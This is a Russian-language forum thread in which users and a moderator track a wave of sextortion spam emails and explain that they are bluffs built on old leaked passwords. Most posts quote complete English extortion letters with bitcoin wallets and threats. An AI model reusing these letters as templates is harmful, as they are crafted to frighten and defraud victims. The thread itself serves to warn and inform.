zazias, тогда у Вас тот неприятный случай, о котором я упоминал в самом начале темы: если пароли для доступа к соцсетям или сервисам Вы делаете аналогичными почтовому ящику, который используется в качестве логина, то действительно можно и получить утечку конфиденциальных данных, и потерять доступ к ящику в частности. Тем более это было крайне неосмотрительно, с Вашей стороны, если пароль ещё и администраторский, позволяющий получить полный доступ и, впоследствии, контроль над всем содержимым сервера.
Кстати, нет никаких гарантий, что помимо полного доступа злоумышленники не запрятали среди скопища файлов и крохотную бэкдор-программу, которая позволит им в будущем (когда пароль сменят, а дырки закроют) скрытно получать контроль над сервером и продолжать сливать из него информацию.
  • Grot666

Мне кажется что почту давно уже угнали. Задолго до того как этот спам начал приходить. Уже выяснили, что спам мошенники взяли логины и пароли скорее всего с даркнета.  Их афера оказалась очень успешной. По подсчетам всех кошельков они заработали уже больше 20 тыс дол
  • Dmitry

NN, на моей почте в отправленных письма нет
  • Dmitry

VirusHunter,  в пришедшем письме вообще нет речи и не указаны мои пароли. В отправленных тоже письма нет. Кстати пришло еще одно такое же письмо, только чел представляется как - llewellyn30. Письмо пришло несмотря на то что пароль я сегодня сменил. У меня вообще подозрение, что пиьсма шлются не моей почты, а с почты с таким же названием. Если ввести в гугл указанный биткоин - 1MN7A7QqQaAVoxV4zdjdrnEHXmjhzcQ4Bq, то можно найти несколько сайтов, в том числе и - https://www.bitcoinabuse.com/reports/1MN7A7QqQaAVoxV4zdjdrnEHXmjhzcQ4Bq, где люди активно жалуются на аналогичные письма.

  • VirusHunter

Я сразу точно установил, что пароли, которые злоумышленники присылают мне на старый емэил, в связке с ним использовались для авторизации в Квипе и Аське, примерно 8 лет назад. Более эти пароли ни с чем у меня не связаны, так что их афиширование никакой угрозы для меня не представляет.
Что же касается остальных людей - судя по всему, сообщённые им злоумышленниками пароли также взяты от разных ресурсов, на которых люди регистрировались довольно таки давно, опять же используя соответствующие емэйлы в качестве логинов.
Проблемы с ящиками и больше возникают лишь у того, кто использовал пароль от ящика и в качестве пароля для доступа к другим сайтам, взломы баз данных которых имели место быть в период с 2009 по 2012 годы. Если пароль на ящик с тех пор не менялся пользователем, то кроме шантажа злоумышленники могут действительно получить доступ к ящику жертвы, а через него и к разным вещам, уже не связанным со взломанными ранее сайтами.
  • NN

Dmitry,  если нет в отправленных, тогда , по-видимому, ок. Как писал ранее администратор, письма с Вашего адреса приходят с помощью программы подмены адресов.
  • VirusHunter

В последние пару дней вымогатели снова поменяли текст и тему писем - в частности, в тексте писем варьируются: ники "школоты", суммы "выкупа" и крипто-кошельки. Пример одного из таких писем:

Тема письма:
[Ваш адрес почты] is hacked

Текст письма:

Hello!

My nickname in darknet is elias11.
I hacked this mailbox more than six months ago,
through it I infected your operating system with a virus (trojan) created by me and have been monitoring you for a long time.

So, your password from
[Ваш адрес почтового ящика] is [реальный пароль, который Вы используете]

Even if you changed the password after that - it does not matter, my virus intercepted all the caching data on your computer
and automatically saved access for me.

I have access to all your accounts, social networks, email, browsing history.
Accordingly, I have the data of all your contacts, files from your computer, photos and videos.

I was most struck by the intimate content sites that you occasionally visit.
You have a very wild imagination, I tell you!

During your pastime and entertainment there, I took screenshot through the camera of your device, synchronizing with what you are watching.
Oh my god! You are so funny and excited!

I think that you do not want all your contacts to get these files, right?
If you are of the same opinion, then I think that $877 is quite a fair price to destroy the dirt I created.

Send the above amount on my BTC wallet (bitcoin): 1EZS92K4xJbymDLwG4F7PNF5idPE62e9XY
As soon as the above amount is received, I guarantee that the data will be deleted, I do not need it.

Otherwise, these files and history of visiting sites will get all your contacts from your device.
Also, I'll send to everyone your contact access to your email and access logs, I have carefully saved it!

Since reading this letter you have 48 hours!
After your reading this message, I'll receive an automatic notification that you have seen the letter.

I hope I taught you a good lesson.
Do not be so nonchalant, please visit only to proven resources, and don't enter your passwords anywhere!
Good luck!

  • Grot666

А мне от бернарда и берни 4 дня назад пришло
  • Grot666

Теперь в заголовке адрес почты которую якобы взломали
  • VirusHunter

Да, тема письма - комбинация емэйла и пароля. Ник вымогателя и кошелёк могут варьироваться - пример нового текста писем:

Hi, my victim.
I know your password -
[Ваш пароль от учётной записи/ящика]

This is my last warning.

I write you inasmuch as I put a trojan on the web page with pornography which you have visited.
My malware grabbed all your personal data and switched on your webcam which captured the process of your masturbation. Just after that the trojan saved your contact list.
I will remove the compromising video and data if you pay me 500 USD in bitcoin. This is wallet address for payment : 16LU6SwUDdLsAy7XXHSMg7BRbA1kfDoBnZ
(you can google on "how to buy bitcoin")

I give you 24 hours after you view my message to make the payment.
As soon as you view the message I'll know it right away.
It is not necessary to tell me that you have sent money to me. This address is connected to you, my system will delete everything automatically after transfer confirmation.
You can visit the police office but no one can't help you.
If you try to cheat me, I'll see it immediately!
I don't live in your country. So nobody can't track my location even for 9 months.
Don't forget about the disgrace and to ignore, Your life can be ruined.

  • Nastasia

Ребята, всем привет!
Тож приходят такие письма на рабочую почту, заметила 20 октября, т.к. пришло не в спам, залезла в спам - там отфильтрованные еще два письма 10 и 18 октября.
Что странно - почте только 3 года, пароль не был использован для почты, но является почти реальным для нескольких сервисов. Сервисы это рабочие, занимаюсь SEO и соотв-но это различные сервисы по проверке сайта и т.п. С реальным пароль не совпадает до нескольких символов в конце (первая часть вся правильная). Ну и пароль от компа рабочего тож частично содержит эти символы.
Даже не знаю, откуда мб утечка этих данных. Сисадмин советует не менять пароль от компа и т.п., т.к. по сути главное почта, на ней такого пароля не было. Если есть мысли - буду благодарна)
  • Grot666

password ([пароль]) for [адрес почты] is compromised - это новый заголовок письма. Интересно, на этом их изобретательность закончится?
Письма стали приходить значительно реже. 1-2 письма раз в 3-4 дня. До этого каждые 2 дня по 3-5 писем.
  • VirusHunter

Да, тоже такое письмо пришло (с такой темой), правда текст снова изменился:

Hello!

I'm a hacker who cracked your email and device a few months ago.
You entered a password on one of the sites you visited, and I intercepted it.
This is your password from
[Ваш адрес эл. почты] on moment of hack: [Ваш пароль к ящику/эккаунту]

Of course you can will change it, or already changed it.
But it doesn't matter, my malware updated it every time.

Do not try to contact me or find me, it is impossible, since I sent you an email from your account.

Through your email, I uploaded malicious code to your Operation System.
I saved all of your contacts with friends, colleagues, relatives and a complete history of visits to the Internet resources.
Also I installed a Trojan on your device and long tome spying for you.

You are not my only victim, I usually lock computers and ask for a ransom.
But I was struck by the sites of intimate content that you often visit.

I am in shock of your fantasies! I've never seen anything like this!

So, when you had fun on piquant sites (you know what I mean!)
I made screenshot with using my program from your camera of yours device.
After that, I combined them to the content of the currently viewed site.

There will be laughter when I send these photos to your contacts!
BUT I'm sure you don't want it.

Therefore, I expect payment from you for my silence.
I think $829 is an acceptable price for it!

Pay with Bitcoin.
My BTC wallet: 1JTtwbvmM7ymByxPYCByVYCwasjH49J3Vj

If you do not know how to do this - enter into Google "how to transfer money to a bitcoin wallet". It is not difficult.
After receiving the specified amount, all your data will be immediately destroyed automatically. My virus will also remove itself from your operating system.

My Trojan have auto alert, after this email is read, I will be know it!

I give you 2 days (48 hours) to make a payment.
If this does not happen - all your contacts will get crazy shots from your dark secret life!
And so that you do not obstruct, your device will be blocked (also after 48 hours)

Do not be silly!
Police or friends won't help you for sure ...

p.s. I can give you advice for the future. Do not enter your passwords on unsafe sites.

I hope for your prudence.
Farewell.
  • VirusHunter

Nastasia, если пароль, указанный в письмах вымогателей, не соответствует какому-либо из реально Вами используемых, то опасаться нечего.
P.S. Если ящику всего пара-тройка лет и на него приходят такие же письма, как и тем, у кого ящикам под 10 лет или больше, то, очевидно, на каких-то ресурсах, где ящик использовался в качестве логина, также имела место быть утечка данных, или ящиком Вы стали пользоваться не так давно, а до этого кто-то его таки использовал для регистрации на каких-то сайтах (например, если адрес емэил принадлежит организации, или был передан Вам в пользование кем-то из IT'ишников, обслуживающих компьютеры Вашей организации/компании).
  • VirusHunter

Есть у меня подозрения, что многие люди видят свой пароль (актуальный или когда-либо ранее используемый) с лишними символами в начале или в конце по одной простой причине: когда злоумышленники разгребали базу данных, в спешке были некорректно разобраны участки кода, содержащие пароли - вместе с ними к паролю добавился символьный мусор из цепочки кода. Если вымогатели перепроверять пароль не будут (а, скорее всего, таки не будут), то, соответственно, и воспользоваться последним (если даже он актуален) не смогут из-за лишних символов.
  • Grot666

VirusHunter, а мое как объясните? мне приходят разные варианты. Верный пароль, а потом через время не верный. лишняя буква в пароле. Вот в 11:47 пришел уже не верный пароль.
  • VirusHunter

Там же явно не один человек имеет доступ к взломанной базе - один копирует пароль аккуратнее, другой - спешит, нервничает и захватывает в буфер лишние куски кода.
  • Grot666

Читал неделю назад, что так называемые хакеры стали создавать темы, мол знают как удалить троян и помогут. Надо скачать программу одну. понятно что это все бред. Вот что нашел за письмо. Скорее всего, от тех самых хакеров:
http://virusudalit.com/троян-darknet-электронной-почты-удаление-1mn7a7qqqaavox/
  • Grot666

написано на русском очень коряво, но прочитать можно.
  • VirusHunter

Страница переведена онлайн-переводчиком - местами довольно неплохо, а моментами - просто кошмарно. Судя по утверждениям про мнимый троян, писали таки вымогатели.

На момент 18:00 по Украине данной странички там на сайте нет - уже удалили, видать.))
  • Grot666

Внимание! Ещё один вектор атаки — если кто-то поведётся и отправит письмо хакеру, мол докажи, что у тебя есть снимки с моей камеры, то вероятно в ответ ему пришлют: смотри, и прикрепят файл, скажут что самораспаковывающийся архив, например. Или файл Pdf, Word, эксплуатирующий zero-day (уязвимость нулевого дня). Это и будет вирус, который начнет работать, как только пользователь попробует открыть этот файл.
  • Grot666

Взял с одного форума. Не понятно одно. Как я могу ему написать, если адреса не знаю.
  • VirusHunter

Земля полнится слухами... Либо речь идёт о разных вещах, либо кто-то уже пустил по Интернету очередную мистификацию про страшный вирус, от которого нет спасения никому и нигде.))
  • OrrsoN

Вирус Хантер, приветствую! Не буду повторяться, что привело меня сюда, думаю и так понятно. Странно только что приходят эти письма на две моих рабочих корпоративных почты (с корпоративным доменом), созданные в конце 2010 года, и пароли которые приходят в тех письмах - я мог где-то использовать конечно, но точно не в квипе и не в аське. Я никак это связать не могу. Хотя сам квип я использую года с 2003 и до сих пор (из-за одного программиста, которого иначе не выловить). Пароли о которых пишут хакеры - по крайней мере на данный момент не совпадают с текущими используемыми в почте. 

Собственно, зарегистрировался чтоб поинтересоваться, как вы у себя организовываете хранение своих паролей? Вы написали что ещё и поиск по архиву произвели.. у вас какая-то утилита стоит? Я по старинке, просто в экселе логины-пароли храню) но понимаю, что это не очень надежно. Может посоветуете что-то?

  • VirusHunter

Добрый день, OrrsoN. На второй страничке данной темы упоминались ресурсы, которые также были с 2009 по 2012 годы взломаны хакерами - возможно, оттуда и были взяты Ваши старые пароли и адреса емэил.
Касательно того, как я искал соответствие присланных вымогателями мне паролей, скажу просто: поднял давно архивированную базу данных по старым вещам, которые уже давно не посещал/забросил - и там нашёл соответствующие пароли с привязками к Квипу и Аське.
  • VirusHunter

Вымогатели снова сменили тему и текст писем. Вот пример такого письма:

Тема письма:

[Ваш емэил] has password [пароль от ящика/учётной записи]. Password must be changed

Текст письма:

Hello!

I'm a programmer who cracked your email account and device about half year ago.
You entered a password on one of the insecure site you visited, and I catched it.
Your password from
[Ваш емэил] on moment of crack: [пароль от ящика/учётной записи]

Of course you can will change your password, or already made it.
But it doesn't matter, my rat software update it every time.

Please don't try to contact me or find me, it is impossible, since I sent you an email from your email account.

Through your e-mail, I uploaded malicious code to your Operation System.
I saved all of your contacts with friends, colleagues, relatives and a complete history of visits to the Internet resources.
Also I installed a rat software on your device and long tome spying for you.

You are not my only victim, I usually lock devices and ask for a ransom.
But I was struck by the sites of intimate content that you very often visit.

I am in shock of your reach fantasies! Wow! I've never seen anything like this!
I did not even know that SUCH content could be so exciting!

So, when you had fun on intime sites (you know what I mean!)
I made screenshot with using my program from your camera of yours device.
After that, I jointed them to the content of the currently viewed site.

Will be funny when I send these photos to your contacts! And if your relatives see it?
BUT I'm sure you don't want it. I definitely would not want to ...

I will not do this if you pay me a little amount.
I think $870 is a nice price for it!

I accept only Bitcoins.
My BTC wallet: 1PL9ewB1y3iC7EyuePDoPxJjwC4CgAvWTo

If you have difficulty with this - Ask Google "how to make a payment on a bitcoin wallet". It's easy.
After receiving the above amount, all your data will be immediately removed automatically.
My virus will also will be destroy itself from your operating system.

My Trojan have auto alert, after this email is looked, I will be know it!

You have 2 days (48 hours) for make a payment.
If this does not happen - all your contacts will get crazy shots with your dirty life!
And so that you do not obstruct me, your device will be locked (also after 48 hours)

Do not take this frivolously! This is the last warning!
Various security services or antiviruses won't help you for sure (I have already collected all your data).

Here are the recommendations of a professional:
Antiviruses do not help against modern malicious code. Just do not enter your passwords on unsafe sites!

I hope you will be prudent.
Bye.
  • Grot666

Поразительно. Прошел уже месяц, а письма приходят. Мне уже кажется, что это навсегда. Помимо этих мошенников, еще раз в три дня приходит письмо с просьбой перевести деньги на оплату серверов для торент-трекера. Текст один и тот же на протяжении года.
  • VirusHunter

Взломанные базы продавали сами хакеры, потом купленные базы перепродавались ещё кому-то за большие суммы, а потом уже конечные потребители - они же вымогатели - начинали и продолжают рассылать письма "счастья".
Письма, которые получаю я, из разных источников, хотя речь в них идёт про одни и те же несколько паролей от Аськи и Квипа. Закончится это всё тогда, когда люди начнут включать голову и перестанут платить "школоте" выкуп. Пока будут платить - поток писем таки никогда не кончится.
  • VirusHunter

Устала школота писать длинные письма - снова изменила текст, сократив его, почти что, вчетверо.)) Вот он:

Good day!

I've your password -
[Ваш пароль к ящику/учётной записи к сервису]
I hacked your PC through porno site that you seen some time ago with my private spyware.
I've got video of you masturbating(got it from webcam).
I have all of your private information, contacts and friends lists.
So that you pay me 607$ in BTC(you may google how to buy it), or I am sending your video(with all your kinky URLs, he-he) to all your kins and friends.
It'll be ruine.
Wallet: 16KnLkHYhryBovPqT8BP16zxwsGi5urFij

After payment is made, all your personal info will be deleted automatically.
You have 30 hours, I am aware you read this email, clock is ticking.
Sincerely!

  • Grot666

VirusHunter, осмелюсь сделать предположение, что до НГ их таки не хватит).
  • Grot666

Дают 30 часов, а не 48))). Деньги нужны. Аппетиты возросли, а людей все меньше кто ведется на развод
  • VirusHunter

В новогоднюю ночь школота будет уже друг другу слать вместо поздравлений письма "счастья", а в качестве подарков класть под ёлки боксовые версии взломанных баз Квипа, Аськи и прочего. Ну и 30 часов вместо 48, а 600$ вместо 800-900$ - потому как темп жизни всё ускоряется, а денег всё равно ни у кого нет, да и с английским у многих нелады, чтобы просто понять суть того, о чём пишут зловредники... Где-то так я вижу развитие данной проблемы.
  • VirusHunter

Вымогатели снова изменили в письмах: тему скомбинировали из нескольких ранее используемых, увеличили сумму выкупа, сменили кошелёк и полностью переписали "легенду" истории мнимого заражения компьютера вирусом - оказывается, они уже и роутеры всем взломали :))))) Пример новоиспечённых писем:

Тема письма:

Change your password [пароль к ящику/учётной записи] immediately. Your account has been hacked.

Текст письма:

I greet you!

I have bad news for you.
06/28/2018 - on this day I hacked your operating system and got full access to your account
[адрес Вашей почты]
On that day your account (
[адрес Вашей почты]) password was: [пароль к ящику/учётной записи]

It is useless to change the password, my malware intercepts it every time.

How it was:
In the software of the router to which you were connected that day, there was a vulnerability.
I first hacked this router and placed my malicious code on it.
When you entered in the Internet, my trojan was installed on the operating system of your device.

After that, I made a full dump of your disk (I have all your address book, history of viewing sites, all files, phone numbers and addresses of all your contacts).

A month ago, I wanted to lock your device and ask for a small amount of money to unlock.
But I looked at the sites that you regularly visit, and came to the big delight of your favorite resources.
I'm talking about sites for adults.

I want to say - you are a big pervert. You have unbridled fantasy!

After that, an idea came to my mind.
I made a screenshot of the intimate website where you have fun (you know what it is about, right?).
After that, I took off your joys (using the camera of your device). It turned out beautifully, do not hesitate.

I am strongly belive that you would not like to show these pictures to your relatives, friends or colleagues.
I think $974 is a very small amount for my silence.
Besides, I spent a lot of time on you!

I accept money only in Bitcoins.
My BTC wallet: 15ZHnf1MPn6ybb8yUeAoCQ1AJtiKhg3NrP

You do not know how to replenish a Bitcoin wallet?
In any search engine write "how to send money to btc wallet".
It's easier than send money to a credit card!

For payment you have a little more than two days (exactly 50 hours).
Do not worry, the timer will start at the moment when you open this letter. Yes, yes .. it has already started!

After payment, my virus and dirty photos with you self-destruct automatically.
Narrative, if I do not receive the specified amount from you, then your device will be blocked, and all your contacts will receive a photos with your "joys".

I want you to be prudent.
- Do not try to find and destroy my virus! (All your data is already uploaded to a remote server)
- Do not try to contact me (this is not feasible, I sent you an email from your account)
- Various security services will not help you; formatting a disk or destroying a device will not help either, since your data is already on a remote server.

P.S. I guarantee you that I will not disturb you again after payment, as you are not my single victim.
 This is a hacker code of honor.

>From now on, I advise you to use good antiviruses and update them regularly (several times a day)!

Don't be mad at me, everyone has their own work.
Farewell.

  • Dmitry

Школота совсем оборзела)). Уже китайскими иероглифами письма пишут. Штук 5 пришло за последние 4 дня.
  • VirusHunter

Базы данных 100% переходят из рук в руки - последние дней 5 источники отправки писем школотой "переехали" в страны Востока. Также добавились европейские прокси-сервера, которые в более ранних письмах не фигурировали вообще.
Лично мне, пока что, приходили письма исключительно на английском языке. Хотя пользователи сообщали, что многим приходили и на ломанном русском.
  • VirusHunter

На протяжении последних двух недель приходили отдельные письма, в которых вымогатели использовали ранее описанные тексты, а также комбинации и вариации ранее используемых тем сообщений. Однако текст сегодняшних писем изменился - теперь злоумышленники утверждают, что якобы получили пароли от онлайн-сервисов и почты жертвы путём использования уязвимости в ПО роутеров от компании Cisco.
Стоит отметить, что данное утверждение, как и прошлое - с мнимым заражением компьютеров жертв неким вирусом, снова неубедительное, поскольку роутеры Cisco (в частности, в Украине и России) применяются только крупными компаниями с расширенными сетями внутренних серверов. Причиной тому являются два фактора: во-первых, роутеры Cisco специфичны в настройке и содержат множество параметров, которые обычному пользователю абсолютно не нужны; во-вторых, именно из-за специфичности настроек и расширенного функционала данные роутеры стоят в разы дороже, чем обычные бюджетные аналоги (например, те же TP-link или D-link), имеющие русский интерфейс ПО и настройки, заточенные под отечественного потребителя.
Текст нового письма выглядит теперь так:

Dear user of [домен почтового провайдера]!

I am a spyware software developer.
Your account has been hacked by me in the summer of 2018.

I understand that it is hard to believe, but here is my evidence:
- I sent you this email from your account.
- Password from account
[адрес Вашего почтового ящика]: [пароль от Вашего ящика/учётной записи к онлайн-сервису] (on moment of hack).

The hacking was carried out using a hardware vulnerability through which you went online (Cisco router, vulnerability CVE-2018-0296).

I went around the security system in the router, installed an exploit there.
When you went online, my exploit downloaded my malicious code (rootkit) to your device.
This is driver software, I constantly updated it, so your antivirus is silent all time.

Since then I have been following you (I can connect to your device via the VNC protocol).
That is, I can see absolutely everything that you do, view and download your files and any data to yourself.
I also have access to the camera on your device, and I periodically take photos and videos with you.

At the moment, I have harvested a solid dirt... on you...
I saved all your email and chats from your messangers. I also saved the entire history of the sites you visit.

I note that it is useless to change the passwords. My malware update passwords from your accounts every times.

I know what you like hard funs (adult sites).
Oh, yes .. I'm know your secret life, which you are hiding from everyone.
Oh my God, what are your like... I saw THIS ... Oh, you dirty naughty person ... :)

I took photos and videos of your most passionate funs with adult content, and synchronized them in real time with the image of your camera.
Believe it turned out very high quality!

So, to the business!
I'm sure you don't want to show these files and visiting history to all your contacts.

Transfer $827 to my Bitcoin cryptocurrency wallet: 1Bt4psBJmjfVTcW6eYiJZ6HEbpFgKkBSX4
Just copy and paste the wallet number when transferring.
If you do not know how to do this - ask Google.

My system automatically recognizes the translation.
As soon as the specified amount is received, all your data will be destroyed from my server, and the rootkit will be automatically removed from your system.
Do not worry, I really will delete everything, since I am “working” with many people who have fallen into your position.
You will only have to inform your provider about the vulnerabilities in the router so that other hackers will not use it.

Since opening this letter you have 48 hours.
If funds not will be received, after the specified time has elapsed, the disk of your device will be formatted,
and from my server will automatically send email and sms to all your contacts with compromising material.

I advise you to remain prudent and not engage in nonsense (all files on my server).

Good luck!

  • VirusHunter

Забавная вещь: очевидно, насобирать денег на обед в школьной столовой у школоты никак не получается и по этой причине письма "счастья" начали приходить пользователям, у которых никакие учётки вообще не взламывались. Отличительной чертой таких писем является отсутствие пароля к почтовому ящику как в теме, так и, непосредственно, в тексте письма, т.е. злоумышленники пытаются взять потенциальную жертву просто на понт. :))
  • Grot666

03/08/2018 был заражен компьютер. за 2 дня пришло 4 письма.
  • VirusHunter

Текст с таким началом сейчас основной в приходящих письмах "счастья". За последнюю неделю мне пришло около 15шт таких писем.
  • VirusHunter

Есть такое дело - мне последние несколько дней также приходят письма "счастья" уже не с моего собственного адреса, а с других. Но они каждый раз разные и, скорее всего, также несуществующие, или же взяты случайным образом из сети Интернет, или из тех же взломанных баз данных.
  • Grot666

You say: this is the old password! Or: I will change my password at any time! Yes! You're right! But the fact is that when you change the password, my trojan always saves a new one! I've been watching you for a few months now. The fact is that you were infected with malware through an adult site that you visited. If you are not familiar with this, I will explain. Trojan Virus gives me full access and control over a computer or other device. This means that I can see everything on your screen, turn on the camera and microphone, but you do not know about it. I also have access to all your contacts and all your correspondence. Why your antivirus did not detect malware? Answer: My malware uses the driver, I update its signatures every 4 hours so that your antivirus is silent. I made a video showing how you satisfy yourself in the left half of the screen, and in the right half you see the video that you watched. With one click of the mouse, I can send this video to all your emails and contacts on social networks. I can also post access to all your e-mail correspondence and messengers that you use. If you want to prevent this, transfer the amount of $708 to my bitcoin address (if you do not know how to do this, write to Google: “Buy Bitcoin”). My bitcoin address (BTC Wallet) is: 19Q3HZtnznuB5cuWng8cacwqZV13gNpZaN After receiving the payment, I will delete the video and you will never hear me again. I give you 48 hours to pay. I have a notice reading this letter, and the timer will work when you see this letter. Filing a complaint somewhere does not make sense because this email cannot be tracked like my bitcoin address. I do not make any mistakes. If I find that you have shared this message with someone else, the video will be immediately distributed. Best wishes!
  • VirusHunter

В последние несколько дней опять начали присылать письма - тексты и темы варьируются из фрагментов, использованных в более ранних письмах. Нового, в принципе, ничего не добавилось. А, ну, разве что, ещё опять в качестве отправителя якобы мой собственный адрес.)) А так - всё из старого репертуара.
  • Grot666

Мне не писали дней 20). Уже думал все). И тут опять. Уже 5 писем пришло
  • VirusHunter

За последние 3 дня получил более 30-ти писем. Если не считать небольших вариаций текстов, которые, практически, идентичны ранее используемым вымогателями, изменения коснулись имён "отправителей" и темы посланий. Также - впервые за весь период рассылки афёрных писем - получил письмо на китайском языке.))
Параметры писем, которые изменились:

Отправитель: Security Team

Адрес отправителя: возможные варианты - якобы от Вас самих же; случайный реальный адрес, взятый откуда-то из Интернета; несуществующий адрес, сгенерированный из случайных фрагментов или же случайного набора латинских букв и цифр.

Тема писем: Frauders known your old password ([пароль от Вашего ящика/учётной записи]). Password must be changed.
  • Grot666

Мне вчера и сегодня пришло 3 письма на китайском тоже)
  • Grot666

If you have already changed your password, my malware will be intercepts it every time. You may not know me, and you are most likely wondering why you are receiving this email, right? In fact, I posted a malicious program on adults (pornography) of some websites, and you know that you visited these websites to enjoy (you know what I mean). While you were watching video clips, my trojan started working as a RDP (remote desktop) with a keylogger that gave me access to your screen as well as a webcam. Immediately after this, my program gathered all your contacts from messenger, social networks, and also by e-mail. What I've done? I made a double screen video. The first part shows the video you watched (you have good taste, yes ... but strange for me and other normal people), and the second part shows the recording of your webcam. What should you do? Well, I think $728 (USD dollars) is a fair price for our little secret. You will make a bitcoin payment (if you don't know, look for "how to buy bitcoins" on Google). BTC Address: 16LBDius3vg6ufFvnc7PGXfiTZgphuZgr5 (This is CASE sensitive, please copy and paste it) Remarks: You have 2 days (48 hours) to pay. (I have a special code, and at the moment I know that you have read this email). If I don't get bitcoins, I will send your video to all your contacts, including family members, colleagues, etc. However, if I am paid, I will immediately destroy the video, and my trojan will be destruct someself. If you want to get proof, answer "Yes!" and resend this letter to youself. And I will definitely send your video to your any 19 contacts. This is a non-negotiable offer, so please do not waste my personal and other people's time by replying to this email. Bye!


  • Grot666

В одном письме угроза опубликовать 18 контактам, в другом 13. Что-то новое.
  • VirusHunter

Что-то снова активизировались аферисты. Изменили тему послания и немного переделали текст. Вот такого содержания письма вымогателей мне приходят последние 4 дня:

Тема послания:
High danger. Your account was attacked.

Адрес отправителя:
якобы письмо отправлено с Вашего же ящика (на который оно Вам и пришло)

Текст письма (могут варьироваться номер крипто-кошелька, сумма выкупа и некоторые мелкие фрагменты текста):

Hi!

As you may have noticed, I sent you an email from your account.
This means that I have full access to your acc: On moment of crack
[Ваш ящик, на который было получено данное письмо] password: [пароль от Вашего ящика или Интернет-портала, на котором данный Ваш емэил использовался в качестве логина]

You say: this is my, but old password!
Or: I will change my password at any time!

Of course! You will be right,
but the fact is that when you change the password, my malicious code every time saved a new one!

I've been watching you for a few months now.
But the fact is that you were infected with malware through an adult site that you visited.

If you are not familiar with this, I will explain.
Trojan Virus gives me full access and control over a computer or other device.
This means that I can see everything on your screen, turn on the camera and microphone, but you do not know about it.

I also have access to all your contacts and all your correspondence from e-mail and messangers.

Why your antivirus did not detect my malware?
Answer: My malware uses the driver, I update its signatures every 4 hours so that your antivirus is silent.

I made a video showing how you satisfy yourself in the left half of the screen, and in the right half you see the video that you watched.
With one click of the mouse, I can send this video to all your emails and contacts on social networks. I can also post access to all your e-mail correspondence and messengers that you use.

If you want to prevent this, transfer the amount of $780 to my bitcoin address (if you do not know how to do this, write to Google: "Buy Bitcoin").

My bitcoin address (BTC Wallet) is: 1KeCBKUgQDyyMpaXhfpRi2qUvyrjcsT44o

After receiving the payment, I will delete the video and you will never hear me again.
I give you 48 hours to pay.
I have a notice reading this letter, and the timer will work when you see this letter.

Filing a complaint somewhere does not make sense because this email cannot be tracked like my bitcoin address.
I do not make any mistakes.

If I find that you have shared this message with someone else, the video will be immediately distributed.
Bye!

  • Grot666

LAST WARNING fort666@ukr.net! You have the last chance to save your social life - I am not kidding!! I give you the last 72 hours to make the payment before I send the video with your masturbation to all your friends and associates. The last time you visited a erotic website with young Teens, you downloaded and installed the software I developed. My program has turned on your camera and recorded your act of Masturbation and the video you were masturbating to. My software also downloaded all your email contact lists and a list of your Facebook friends. I have both the 'Fort.mp4' with your masturbation and a file with all your contacts on my hard drive. You are very perverted! If you want me to delete both files and keep your secret, you must send me Bitcoin payment. I give you the last 72 hours. If you don't know how to send Bitcoins, visit Google. Send 2000 USD to this Bitcoin address immediately: 3AajMVmJd1sbxX9AjRiuNeD4D4shJYrysf (copy and paste) 1 BTC = 3470 USD right now, so send exactly 0.581845 BTC to the address above. Do not try to cheat me! As soon as you open this Email I will know you opened it. This Bitcoin address is linked to you only, so I will know if you sent the correct amount. When you pay in full, I will remove both files and deactivate my software. If you don't send the payment, I will send your masturbation video to ALL YOUR FRIENDS AND ASSOCIATES from your contact list I hacked. Here are the payment details again: Send 0.581845 BTC to this Bitcoin address: ---------------------------------------- 3AajMVmJd1sbxX9AjRiuNeD4D4shJYrysf ---------------------------------------- You саn visit the police but nobody will help you. I know what I am doing. I don't live in your country and I know how to stay anonymous. Don't try to deceive me - I will know it immediately - my spy ware is recording all the websites you visit and all keys you press. If you do - I will send this ugly recording to everyone you know, including your family. Don't cheat me! Don't forget the shame and if you ignore this message your life will be ruined. I am waiting for your Bitcoin payment. Lilliam Anonymous Hacker P.S. If you need more time to buy and send 0.581845 BTC, open your notepad and write '48h plz'. I will consider giving you another 48 hours before I release the vid, but only when I really see you are struggling to buy bitcoin.


  • Grot666

Такого еще не было. в плейлисте якобы указан логин из почтового ящика. Письмо еще более убедительное. Кому похожее пришло?
  • VirusHunter

Как понять "логин из почтового ящика" - ? У меня логином в Квипе и Аське и был старый адрес емэил, так что все письма "счастья"  приходили с указанием моего старого почтового адреса и на него же.
  • Grot666

У меня приходили письма от пароля на сайте знакомств. а сейчас они указали просто мой ящик без пароля и от него fort. Написали,  что назвали файл "fort.mp3" и загрузят всем моим контактам.Номер кошелька по базе не пробил, но нашел по нику анонимуса якобы, то у другого подписано "into". В отчете написано
  • Grot666

Same as others. You have the last chance to save your social life - I am not kidding!! I give you the last 72 hours to make the payment before I send the video with your masturbation to all your friends and associates. The last time you visited a erotic website with young Teens, you downloaded and installed the software I developed. My program has turned on your camera and recorded your act of Masturbation and the video you were masturbating to. My software also downloaded all your email contact lists and a list of your Facebook friends. I have both the 'Info.mp4' with your masturbation and a file with all your contacts on my hard drive. You are very perverted! If you want me to delete both files and keep your secret, you must send me Bitcoin payment. I give you the last 72 hours. If you don't know how to send Bitcoins, visit Google. Send 2000 USD to this Bitcoin address immediately
  • VirusHunter

Не совсем понял какой MP3-файл и с записью чего вымогатели угрожают опубликовать Вашим контактам.
На счёт емэйла: письма сейчас случайным образом приходят и людям, которые ни в аськах-квипах, ни в каких-либо соц. сетях или онлайн-сервисах никогда не регистрировались. Похоже, рыбалка "на живца" у вымогателей не прокатила и они сейчас пытаются взять на понт случайных пользователей, емэйлы которых просто где-то засветились в Интернете, и не являются логинами к каким-либо сайтам или онлайн-сервисам, которые когда-то были взломаны.
Файлы с программами, расположенными по Вашей первой ссылке, чистые (не знаю, насколько они полезные, но хотя бы не вредоносные).
  • Grot666

Ясно что у них нет никакого файла. Просто они хотят свое вранье подкрепить якобы фактами. Они берут имя почты и называют файл так же.Возможно дальше будут присылать файлы, что бы владелец почты открыл и они могли заразить компьютер. Даже те кто не верят, могут чисто из любопытства открыть.
Я весь этот спам уже не читая удаляю, но вчера такой заголовок письма пришел, что взяло любопытство.
  • Grot666

I have both the 'Fort.mp4' with your masturbation and a file with all your contacts on my hard drive. You are very perverted!
---
Еще и присылает в каком формате файл, что бы вранье еще более убедительно звучало.
  • VirusHunter

Если письма приходят с вложением, сохраните его, пожалуйста, и залейте на какой-нибудь расшаренный ресурс, не требующий для скачивания регистрации (например, Турбобит). Ссылку на файл скиньте нам в раздел "Контакты" с припиской, что для VirusHunter'а.
  • Grot666

Не, вложения не было. Он просто в письме написал, что "fort.mp4" разошлет всем моим контактам.
  • VirusHunter

